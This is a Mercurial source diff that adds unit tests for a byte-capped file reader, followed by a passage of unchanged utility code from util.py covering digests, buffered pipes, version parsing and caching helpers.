util: add a file object proxy that can read at most N bytes...
Gregory Szorc
r36382:01e29e88 default
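The new test file below exercises the proxy. The util.py hunk further down is unchanged context and does not show the new class itself, so here is a minimal sketch of a capped reader with the semantics the tests expect; the cappedreader name and the (fh, limit) signature come from the tests, while the body is an assumption and the real implementation in mercurial/util.py may differ:

    class cappedreader(object):
        """A file object proxy that allows reading up to N bytes.

        Sketch reconstructed from the tests below.
        """
        def __init__(self, fh, limit):
            self._fh = fh
            self._left = limit

        def read(self, b=-1):
            # once the cap is exhausted, report EOF without touching
            # the underlying file object
            if not self._left:
                return b''
            if b < 0:
                b = self._left
            # never request more than the remaining cap from the source
            data = self._fh.read(min(b, self._left))
            self._left -= len(data)
            return data
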
@@ -0,0 +1,91 b''
1 from __future__ import absolute_import, print_function
2
3 import io
4 import unittest
5
6 from mercurial import (
7 util,
8 )
9
10 class CappedReaderTests(unittest.TestCase):
11 def testreadfull(self):
12 source = io.BytesIO(b'x' * 100)
13
14 reader = util.cappedreader(source, 10)
15 res = reader.read(10)
16 self.assertEqual(res, b'x' * 10)
17 self.assertEqual(source.tell(), 10)
18 source.seek(0)
19
20 reader = util.cappedreader(source, 15)
21 res = reader.read(16)
22 self.assertEqual(res, b'x' * 15)
23 self.assertEqual(source.tell(), 15)
24 source.seek(0)
25
26 reader = util.cappedreader(source, 100)
27 res = reader.read(100)
28 self.assertEqual(res, b'x' * 100)
29 self.assertEqual(source.tell(), 100)
30 source.seek(0)
31
32 reader = util.cappedreader(source, 50)
33 res = reader.read()
34 self.assertEqual(res, b'x' * 50)
35 self.assertEqual(source.tell(), 50)
36 source.seek(0)
37
38 def testreadnegative(self):
39 source = io.BytesIO(b'x' * 100)
40
41 reader = util.cappedreader(source, 20)
42 res = reader.read(-1)
43 self.assertEqual(res, b'x' * 20)
44 self.assertEqual(source.tell(), 20)
45 source.seek(0)
46
47 reader = util.cappedreader(source, 100)
48 res = reader.read(-1)
49 self.assertEqual(res, b'x' * 100)
50 self.assertEqual(source.tell(), 100)
51 source.seek(0)
52
53 def testreadmultiple(self):
54 source = io.BytesIO(b'x' * 100)
55
56 reader = util.cappedreader(source, 10)
57 for i in range(10):
58 res = reader.read(1)
59 self.assertEqual(res, b'x')
60 self.assertEqual(source.tell(), i + 1)
61
62 self.assertEqual(source.tell(), 10)
63 res = reader.read(1)
64 self.assertEqual(res, b'')
65 self.assertEqual(source.tell(), 10)
66 source.seek(0)
67
68 reader = util.cappedreader(source, 45)
69 for i in range(4):
70 res = reader.read(10)
71 self.assertEqual(res, b'x' * 10)
72 self.assertEqual(source.tell(), (i + 1) * 10)
73
74 res = reader.read(10)
75 self.assertEqual(res, b'x' * 5)
76 self.assertEqual(source.tell(), 45)
77
78 def testreadlimitpasteof(self):
79 source = io.BytesIO(b'x' * 100)
80
81 reader = util.cappedreader(source, 1024)
82 res = reader.read(1000)
83 self.assertEqual(res, b'x' * 100)
84 self.assertEqual(source.tell(), 100)
85 res = reader.read(1000)
86 self.assertEqual(res, b'')
87 self.assertEqual(source.tell(), 100)
88
89 if __name__ == '__main__':
90 import silenttestrunner
91 silenttestrunner.main(__name__)
@@ -1,3979 +1,4008 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 node as nodemod,
53 53 policy,
54 54 pycompat,
55 55 urllibcompat,
56 56 )
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 spawndetached = platform.spawndetached
151 151 split = platform.split
152 152 sshargs = platform.sshargs
153 153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 154 statisexec = platform.statisexec
155 155 statislink = platform.statislink
156 156 testpid = platform.testpid
157 157 umask = platform.umask
158 158 unlink = platform.unlink
159 159 username = platform.username
160 160
161 161 try:
162 162 recvfds = osutil.recvfds
163 163 except AttributeError:
164 164 pass
165 165 try:
166 166 setprocname = osutil.setprocname
167 167 except AttributeError:
168 168 pass
169 169 try:
170 170 unblocksignal = osutil.unblocksignal
171 171 except AttributeError:
172 172 pass
173 173
174 174 # Python compatibility
175 175
176 176 _notset = object()
177 177
178 178 # disable Python's problematic floating point timestamps (issue4836)
179 179 # (Python hypocritically says you shouldn't change this behavior in
180 180 # libraries, and sure enough Mercurial is not a library.)
181 181 os.stat_float_times(False)
182 182
183 183 def safehasattr(thing, attr):
184 184 return getattr(thing, attr, _notset) is not _notset
185 185
186 186 def _rapply(f, xs):
187 187 if xs is None:
188 188 # assume None means non-value of optional data
189 189 return xs
190 190 if isinstance(xs, (list, set, tuple)):
191 191 return type(xs)(_rapply(f, x) for x in xs)
192 192 if isinstance(xs, dict):
193 193 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
194 194 return f(xs)
195 195
196 196 def rapply(f, xs):
197 197 """Apply function recursively to every item preserving the data structure
198 198
199 199 >>> def f(x):
200 200 ... return 'f(%s)' % x
201 201 >>> rapply(f, None) is None
202 202 True
203 203 >>> rapply(f, 'a')
204 204 'f(a)'
205 205 >>> rapply(f, {'a'}) == {'f(a)'}
206 206 True
207 207 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
208 208 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
209 209
210 210 >>> xs = [object()]
211 211 >>> rapply(pycompat.identity, xs) is xs
212 212 True
213 213 """
214 214 if f is pycompat.identity:
215 215 # fast path mainly for py2
216 216 return xs
217 217 return _rapply(f, xs)
218 218
219 219 def bytesinput(fin, fout, *args, **kwargs):
220 220 sin, sout = sys.stdin, sys.stdout
221 221 try:
222 222 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
223 223 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
224 224 finally:
225 225 sys.stdin, sys.stdout = sin, sout
226 226
227 227 def bitsfrom(container):
228 228 bits = 0
229 229 for bit in container:
230 230 bits |= bit
231 231 return bits
232 232
233 233 # python 2.6 still has deprecation warnings enabled by default. We do not want
234 234 # to display anything to the standard user, so detect if we are running tests and
235 235 # only use python deprecation warnings in this case.
236 236 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
237 237 if _dowarn:
238 238 # explicitly unfilter our warning for python 2.7
239 239 #
240 240 # The option of setting PYTHONWARNINGS in the test runner was investigated.
241 241 # However, module name set through PYTHONWARNINGS was exactly matched, so
242 242 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
243 243 # makes the whole PYTHONWARNINGS thing useless for our usecase.
244 244 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
245 245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
247 247
248 248 def nouideprecwarn(msg, version, stacklevel=1):
249 249 """Issue an python native deprecation warning
250 250
251 251 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
252 252 """
253 253 if _dowarn:
254 254 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
255 255 " update your code.)") % version
256 256 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
257 257
258 258 DIGESTS = {
259 259 'md5': hashlib.md5,
260 260 'sha1': hashlib.sha1,
261 261 'sha512': hashlib.sha512,
262 262 }
263 263 # List of digest types from strongest to weakest
264 264 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
265 265
266 266 for k in DIGESTS_BY_STRENGTH:
267 267 assert k in DIGESTS
268 268
269 269 class digester(object):
270 270 """helper to compute digests.
271 271
272 272 This helper can be used to compute one or more digests given their name.
273 273
274 274 >>> d = digester([b'md5', b'sha1'])
275 275 >>> d.update(b'foo')
276 276 >>> [k for k in sorted(d)]
277 277 ['md5', 'sha1']
278 278 >>> d[b'md5']
279 279 'acbd18db4cc2f85cedef654fccc4a4d8'
280 280 >>> d[b'sha1']
281 281 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
282 282 >>> digester.preferred([b'md5', b'sha1'])
283 283 'sha1'
284 284 """
285 285
286 286 def __init__(self, digests, s=''):
287 287 self._hashes = {}
288 288 for k in digests:
289 289 if k not in DIGESTS:
290 290 raise Abort(_('unknown digest type: %s') % k)
291 291 self._hashes[k] = DIGESTS[k]()
292 292 if s:
293 293 self.update(s)
294 294
295 295 def update(self, data):
296 296 for h in self._hashes.values():
297 297 h.update(data)
298 298
299 299 def __getitem__(self, key):
300 300 if key not in DIGESTS:
300 300 raise Abort(_('unknown digest type: %s') % key)
302 302 return nodemod.hex(self._hashes[key].digest())
303 303
304 304 def __iter__(self):
305 305 return iter(self._hashes)
306 306
307 307 @staticmethod
308 308 def preferred(supported):
309 309 """returns the strongest digest type in both supported and DIGESTS."""
310 310
311 311 for k in DIGESTS_BY_STRENGTH:
312 312 if k in supported:
313 313 return k
314 314 return None
315 315
316 316 class digestchecker(object):
317 317 """file handle wrapper that additionally checks content against a given
318 318 size and digests.
319 319
320 320 d = digestchecker(fh, size, {'md5': '...'})
321 321
322 322 When multiple digests are given, all of them are validated.
323 323 """
324 324
325 325 def __init__(self, fh, size, digests):
326 326 self._fh = fh
327 327 self._size = size
328 328 self._got = 0
329 329 self._digests = dict(digests)
330 330 self._digester = digester(self._digests.keys())
331 331
332 332 def read(self, length=-1):
333 333 content = self._fh.read(length)
334 334 self._digester.update(content)
335 335 self._got += len(content)
336 336 return content
337 337
338 338 def validate(self):
339 339 if self._size != self._got:
340 340 raise Abort(_('size mismatch: expected %d, got %d') %
341 341 (self._size, self._got))
342 342 for k, v in self._digests.items():
343 343 if v != self._digester[k]:
344 344 # i18n: first parameter is a digest name
345 345 raise Abort(_('%s mismatch: expected %s, got %s') %
346 346 (k, v, self._digester[k]))
347 347
348 348 try:
349 349 buffer = buffer
350 350 except NameError:
351 351 def buffer(sliceable, offset=0, length=None):
352 352 if length is not None:
353 353 return memoryview(sliceable)[offset:offset + length]
354 354 return memoryview(sliceable)[offset:]
355 355
356 356 closefds = pycompat.isposix
357 357
358 358 _chunksize = 4096
359 359
360 360 class bufferedinputpipe(object):
361 361 """a manually buffered input pipe
362 362
363 363 Python will not let us use buffered IO and lazy reading with 'polling' at
364 364 the same time. We cannot probe the buffer state and select will not detect
365 365 that data are ready to read if they are already buffered.
366 366
367 367 This class lets us work around that by implementing its own buffering
368 368 (allowing efficient readline) while offering a way to know if the buffer is
369 369 empty from the output (allowing collaboration of the buffer with polling).
370 370
371 371 This class lives in the 'util' module because it makes use of the 'os'
372 372 module from the python stdlib.
373 373 """
374 374
375 375 def __init__(self, input):
376 376 self._input = input
377 377 self._buffer = []
378 378 self._eof = False
379 379 self._lenbuf = 0
380 380
381 381 @property
382 382 def hasbuffer(self):
383 383 """True is any data is currently buffered
384 384
385 385 This will be used externally a pre-step for polling IO. If there is
386 386 already data then no polling should be set in place."""
387 387 return bool(self._buffer)
388 388
389 389 @property
390 390 def closed(self):
391 391 return self._input.closed
392 392
393 393 def fileno(self):
394 394 return self._input.fileno()
395 395
396 396 def close(self):
397 397 return self._input.close()
398 398
399 399 def read(self, size):
400 400 while (not self._eof) and (self._lenbuf < size):
401 401 self._fillbuffer()
402 402 return self._frombuffer(size)
403 403
404 404 def readline(self, *args, **kwargs):
405 405 if 1 < len(self._buffer):
406 406 # this should not happen because both read and readline end with a
407 407 # _frombuffer call that collapses it.
408 408 self._buffer = [''.join(self._buffer)]
409 409 self._lenbuf = len(self._buffer[0])
410 410 lfi = -1
411 411 if self._buffer:
412 412 lfi = self._buffer[-1].find('\n')
413 413 while (not self._eof) and lfi < 0:
414 414 self._fillbuffer()
415 415 if self._buffer:
416 416 lfi = self._buffer[-1].find('\n')
417 417 size = lfi + 1
418 418 if lfi < 0: # end of file
419 419 size = self._lenbuf
420 420 elif 1 < len(self._buffer):
421 421 # we need to take previous chunks into account
422 422 size += self._lenbuf - len(self._buffer[-1])
423 423 return self._frombuffer(size)
424 424
425 425 def _frombuffer(self, size):
426 426 """return at most 'size' data from the buffer
427 427
428 428 The data are removed from the buffer."""
429 429 if size == 0 or not self._buffer:
430 430 return ''
431 431 buf = self._buffer[0]
432 432 if 1 < len(self._buffer):
433 433 buf = ''.join(self._buffer)
434 434
435 435 data = buf[:size]
436 436 buf = buf[len(data):]
437 437 if buf:
438 438 self._buffer = [buf]
439 439 self._lenbuf = len(buf)
440 440 else:
441 441 self._buffer = []
442 442 self._lenbuf = 0
443 443 return data
444 444
445 445 def _fillbuffer(self):
446 446 """read data to the buffer"""
447 447 data = os.read(self._input.fileno(), _chunksize)
448 448 if not data:
449 449 self._eof = True
450 450 else:
451 451 self._lenbuf += len(data)
452 452 self._buffer.append(data)
453 453
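
A hedged sketch of the collaboration with polling described in the docstring above: consult hasbuffer first and only block in select() when nothing is buffered (the helper name is hypothetical):

    import select

    def readlineblocking(pipe):
        # 'pipe' is assumed to be a bufferedinputpipe around a real pipe;
        # polling a pipe whose buffer already holds data would block wrongly
        if not pipe.hasbuffer:
            select.select([pipe.fileno()], [], [])
        return pipe.readline()
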
454 454 def mmapread(fp):
455 455 try:
456 456 fd = getattr(fp, 'fileno', lambda: fp)()
457 457 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
458 458 except ValueError:
459 459 # Empty files cannot be mmapped, but mmapread should still work. Check
460 460 # if the file is empty, and if so, return an empty buffer.
461 461 if os.fstat(fd).st_size == 0:
462 462 return ''
463 463 raise
464 464
465 465 def popen2(cmd, env=None, newlines=False):
466 466 # Setting bufsize to -1 lets the system decide the buffer size.
467 467 # The default for bufsize is 0, meaning unbuffered. This leads to
468 468 # poor performance on Mac OS X: http://bugs.python.org/issue4194
469 469 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
470 470 close_fds=closefds,
471 471 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
472 472 universal_newlines=newlines,
473 473 env=env)
474 474 return p.stdin, p.stdout
475 475
476 476 def popen3(cmd, env=None, newlines=False):
477 477 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
478 478 return stdin, stdout, stderr
479 479
480 480 def popen4(cmd, env=None, newlines=False, bufsize=-1):
481 481 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
482 482 close_fds=closefds,
483 483 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
484 484 stderr=subprocess.PIPE,
485 485 universal_newlines=newlines,
486 486 env=env)
487 487 return p.stdin, p.stdout, p.stderr, p
488 488
489 489 def version():
490 490 """Return version information if available."""
491 491 try:
492 492 from . import __version__
493 493 return __version__.version
494 494 except ImportError:
495 495 return 'unknown'
496 496
497 497 def versiontuple(v=None, n=4):
498 498 """Parses a Mercurial version string into an N-tuple.
499 499
500 500 The version string to be parsed is specified with the ``v`` argument.
501 501 If it isn't defined, the current Mercurial version string will be parsed.
502 502
503 503 ``n`` can be 2, 3, or 4. Here is how some version strings map to
504 504 returned values:
505 505
506 506 >>> v = b'3.6.1+190-df9b73d2d444'
507 507 >>> versiontuple(v, 2)
508 508 (3, 6)
509 509 >>> versiontuple(v, 3)
510 510 (3, 6, 1)
511 511 >>> versiontuple(v, 4)
512 512 (3, 6, 1, '190-df9b73d2d444')
513 513
514 514 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
515 515 (3, 6, 1, '190-df9b73d2d444+20151118')
516 516
517 517 >>> v = b'3.6'
518 518 >>> versiontuple(v, 2)
519 519 (3, 6)
520 520 >>> versiontuple(v, 3)
521 521 (3, 6, None)
522 522 >>> versiontuple(v, 4)
523 523 (3, 6, None, None)
524 524
525 525 >>> v = b'3.9-rc'
526 526 >>> versiontuple(v, 2)
527 527 (3, 9)
528 528 >>> versiontuple(v, 3)
529 529 (3, 9, None)
530 530 >>> versiontuple(v, 4)
531 531 (3, 9, None, 'rc')
532 532
533 533 >>> v = b'3.9-rc+2-02a8fea4289b'
534 534 >>> versiontuple(v, 2)
535 535 (3, 9)
536 536 >>> versiontuple(v, 3)
537 537 (3, 9, None)
538 538 >>> versiontuple(v, 4)
539 539 (3, 9, None, 'rc+2-02a8fea4289b')
540 540 """
541 541 if not v:
542 542 v = version()
543 543 parts = remod.split('[\+-]', v, 1)
544 544 if len(parts) == 1:
545 545 vparts, extra = parts[0], None
546 546 else:
547 547 vparts, extra = parts
548 548
549 549 vints = []
550 550 for i in vparts.split('.'):
551 551 try:
552 552 vints.append(int(i))
553 553 except ValueError:
554 554 break
555 555 # (3, 6) -> (3, 6, None)
556 556 while len(vints) < 3:
557 557 vints.append(None)
558 558
559 559 if n == 2:
560 560 return (vints[0], vints[1])
561 561 if n == 3:
562 562 return (vints[0], vints[1], vints[2])
563 563 if n == 4:
564 564 return (vints[0], vints[1], vints[2], extra)
565 565
566 566 # used by parsedate
567 567 defaultdateformats = (
568 568 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
569 569 '%Y-%m-%dT%H:%M', # without seconds
570 570 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
571 571 '%Y-%m-%dT%H%M', # without seconds
572 572 '%Y-%m-%d %H:%M:%S', # our common legal variant
573 573 '%Y-%m-%d %H:%M', # without seconds
574 574 '%Y-%m-%d %H%M%S', # without :
575 575 '%Y-%m-%d %H%M', # without seconds
576 576 '%Y-%m-%d %I:%M:%S%p',
577 577 '%Y-%m-%d %H:%M',
578 578 '%Y-%m-%d %I:%M%p',
579 579 '%Y-%m-%d',
580 580 '%m-%d',
581 581 '%m/%d',
582 582 '%m/%d/%y',
583 583 '%m/%d/%Y',
584 584 '%a %b %d %H:%M:%S %Y',
585 585 '%a %b %d %I:%M:%S%p %Y',
586 586 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
587 587 '%b %d %H:%M:%S %Y',
588 588 '%b %d %I:%M:%S%p %Y',
589 589 '%b %d %H:%M:%S',
590 590 '%b %d %I:%M:%S%p',
591 591 '%b %d %H:%M',
592 592 '%b %d %I:%M%p',
593 593 '%b %d %Y',
594 594 '%b %d',
595 595 '%H:%M:%S',
596 596 '%I:%M:%S%p',
597 597 '%H:%M',
598 598 '%I:%M%p',
599 599 )
600 600
601 601 extendeddateformats = defaultdateformats + (
602 602 "%Y",
603 603 "%Y-%m",
604 604 "%b",
605 605 "%b %Y",
606 606 )
607 607
608 608 def cachefunc(func):
609 609 '''cache the result of function calls'''
610 610 # XXX doesn't handle keywords args
611 611 if func.__code__.co_argcount == 0:
612 612 cache = []
613 613 def f():
614 614 if len(cache) == 0:
615 615 cache.append(func())
616 616 return cache[0]
617 617 return f
618 618 cache = {}
619 619 if func.__code__.co_argcount == 1:
620 620 # we gain a small amount of time because
621 621 # we don't need to pack/unpack the list
622 622 def f(arg):
623 623 if arg not in cache:
624 624 cache[arg] = func(arg)
625 625 return cache[arg]
626 626 else:
627 627 def f(*args):
628 628 if args not in cache:
629 629 cache[args] = func(*args)
630 630 return cache[args]
631 631
632 632 return f
633 633
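
For instance, a one-argument function can be memoized like this (expensivesquare is a hypothetical example):

    def expensivesquare(x):
        return x * x

    expensivesquare = cachefunc(expensivesquare)
    expensivesquare(4)  # computed and cached
    expensivesquare(4)  # served from the cache
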
634 634 class cow(object):
635 635 """helper class to make copy-on-write easier
636 636
637 637 Call preparewrite before doing any writes.
638 638 """
639 639
640 640 def preparewrite(self):
641 641 """call this before writes, return self or a copied new object"""
642 642 if getattr(self, '_copied', 0):
643 643 self._copied -= 1
644 644 return self.__class__(self)
645 645 return self
646 646
647 647 def copy(self):
648 648 """always do a cheap copy"""
649 649 self._copied = getattr(self, '_copied', 0) + 1
650 650 return self
651 651
652 652 class sortdict(collections.OrderedDict):
653 653 '''a simple sorted dictionary
654 654
655 655 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
656 656 >>> d2 = d1.copy()
657 657 >>> d2
658 658 sortdict([('a', 0), ('b', 1)])
659 659 >>> d2.update([(b'a', 2)])
660 660 >>> list(d2.keys()) # should still be in last-set order
661 661 ['b', 'a']
662 662 '''
663 663
664 664 def __setitem__(self, key, value):
665 665 if key in self:
666 666 del self[key]
667 667 super(sortdict, self).__setitem__(key, value)
668 668
669 669 if pycompat.ispypy:
670 670 # __setitem__() isn't called as of PyPy 5.8.0
671 671 def update(self, src):
672 672 if isinstance(src, dict):
673 673 src = src.iteritems()
674 674 for k, v in src:
675 675 self[k] = v
676 676
677 677 class cowdict(cow, dict):
678 678 """copy-on-write dict
679 679
680 680 Be sure to call d = d.preparewrite() before writing to d.
681 681
682 682 >>> a = cowdict()
683 683 >>> a is a.preparewrite()
684 684 True
685 685 >>> b = a.copy()
686 686 >>> b is a
687 687 True
688 688 >>> c = b.copy()
689 689 >>> c is a
690 690 True
691 691 >>> a = a.preparewrite()
692 692 >>> b is a
693 693 False
694 694 >>> a is a.preparewrite()
695 695 True
696 696 >>> c = c.preparewrite()
697 697 >>> b is c
698 698 False
699 699 >>> b is b.preparewrite()
700 700 True
701 701 """
702 702
703 703 class cowsortdict(cow, sortdict):
704 704 """copy-on-write sortdict
705 705
706 706 Be sure to call d = d.preparewrite() before writing to d.
707 707 """
708 708
709 709 class transactional(object):
710 710 """Base class for making a transactional type into a context manager."""
711 711 __metaclass__ = abc.ABCMeta
712 712
713 713 @abc.abstractmethod
714 714 def close(self):
715 715 """Successfully closes the transaction."""
716 716
717 717 @abc.abstractmethod
718 718 def release(self):
719 719 """Marks the end of the transaction.
720 720
721 721 If the transaction has not been closed, it will be aborted.
722 722 """
723 723
724 724 def __enter__(self):
725 725 return self
726 726
727 727 def __exit__(self, exc_type, exc_val, exc_tb):
728 728 try:
729 729 if exc_type is None:
730 730 self.close()
731 731 finally:
732 732 self.release()
733 733
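
A minimal sketch of a concrete subclass, with hypothetical commit/rollback hooks; close() runs only when the with-body succeeds, release() always runs:

    class demotransaction(transactional):
        def __init__(self):
            self._closed = False

        def close(self):
            self._closed = True   # commit point

        def release(self):
            if not self._closed:
                pass              # roll back here

    # with demotransaction() as tr:
    #     ...  # an exception skips close() and leads to rollback in release()
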
734 734 @contextlib.contextmanager
735 735 def acceptintervention(tr=None):
736 736 """A context manager that closes the transaction on InterventionRequired
737 737
738 738 If no transaction was provided, this simply runs the body and returns
739 739 """
740 740 if not tr:
741 741 yield
742 742 return
743 743 try:
744 744 yield
745 745 tr.close()
746 746 except error.InterventionRequired:
747 747 tr.close()
748 748 raise
749 749 finally:
750 750 tr.release()
751 751
752 752 @contextlib.contextmanager
753 753 def nullcontextmanager():
754 754 yield
755 755
756 756 class _lrucachenode(object):
757 757 """A node in a doubly linked list.
758 758
759 759 Holds a reference to nodes on either side as well as a key-value
760 760 pair for the dictionary entry.
761 761 """
762 762 __slots__ = (u'next', u'prev', u'key', u'value')
763 763
764 764 def __init__(self):
765 765 self.next = None
766 766 self.prev = None
767 767
768 768 self.key = _notset
769 769 self.value = None
770 770
771 771 def markempty(self):
772 772 """Mark the node as emptied."""
773 773 self.key = _notset
774 774
775 775 class lrucachedict(object):
776 776 """Dict that caches most recent accesses and sets.
777 777
778 778 The dict consists of an actual backing dict - indexed by original
779 779 key - and a doubly linked circular list defining the order of entries in
780 780 the cache.
781 781
782 782 The head node is the newest entry in the cache. If the cache is full,
783 783 we recycle head.prev and make it the new head. Cache accesses result in
784 784 the node being moved to before the existing head and being marked as the
785 785 new head node.
786 786 """
787 787 def __init__(self, max):
788 788 self._cache = {}
789 789
790 790 self._head = head = _lrucachenode()
791 791 head.prev = head
792 792 head.next = head
793 793 self._size = 1
794 794 self._capacity = max
795 795
796 796 def __len__(self):
797 797 return len(self._cache)
798 798
799 799 def __contains__(self, k):
800 800 return k in self._cache
801 801
802 802 def __iter__(self):
803 803 # We don't have to iterate in cache order, but why not.
804 804 n = self._head
805 805 for i in range(len(self._cache)):
806 806 yield n.key
807 807 n = n.next
808 808
809 809 def __getitem__(self, k):
810 810 node = self._cache[k]
811 811 self._movetohead(node)
812 812 return node.value
813 813
814 814 def __setitem__(self, k, v):
815 815 node = self._cache.get(k)
816 816 # Replace existing value and mark as newest.
817 817 if node is not None:
818 818 node.value = v
819 819 self._movetohead(node)
820 820 return
821 821
822 822 if self._size < self._capacity:
823 823 node = self._addcapacity()
824 824 else:
825 825 # Grab the last/oldest item.
826 826 node = self._head.prev
827 827
828 828 # At capacity. Kill the old entry.
829 829 if node.key is not _notset:
830 830 del self._cache[node.key]
831 831
832 832 node.key = k
833 833 node.value = v
834 834 self._cache[k] = node
835 835 # And mark it as newest entry. No need to adjust order since it
836 836 # is already self._head.prev.
837 837 self._head = node
838 838
839 839 def __delitem__(self, k):
840 840 node = self._cache.pop(k)
841 841 node.markempty()
842 842
843 843 # Temporarily mark as newest item before re-adjusting head to make
844 844 # this node the oldest item.
845 845 self._movetohead(node)
846 846 self._head = node.next
847 847
848 848 # Additional dict methods.
849 849
850 850 def get(self, k, default=None):
851 851 try:
852 852 return self._cache[k].value
853 853 except KeyError:
854 854 return default
855 855
856 856 def clear(self):
857 857 n = self._head
858 858 while n.key is not _notset:
859 859 n.markempty()
860 860 n = n.next
861 861
862 862 self._cache.clear()
863 863
864 864 def copy(self):
865 865 result = lrucachedict(self._capacity)
866 866 n = self._head.prev
867 867 # Iterate in oldest-to-newest order, so the copy has the right ordering
868 868 for i in range(len(self._cache)):
869 869 result[n.key] = n.value
870 870 n = n.prev
871 871 return result
872 872
873 873 def _movetohead(self, node):
874 874 """Mark a node as the newest, making it the new head.
875 875
876 876 When a node is accessed, it becomes the freshest entry in the LRU
877 877 list, which is denoted by self._head.
878 878
879 879 Visually, let's make ``N`` the new head node (* denotes head):
880 880
881 881 previous/oldest <-> head <-> next/next newest
882 882
883 883 ----<->--- A* ---<->-----
884 884 | |
885 885 E <-> D <-> N <-> C <-> B
886 886
887 887 To:
888 888
889 889 ----<->--- N* ---<->-----
890 890 | |
891 891 E <-> D <-> C <-> B <-> A
892 892
893 893 This requires the following moves:
894 894
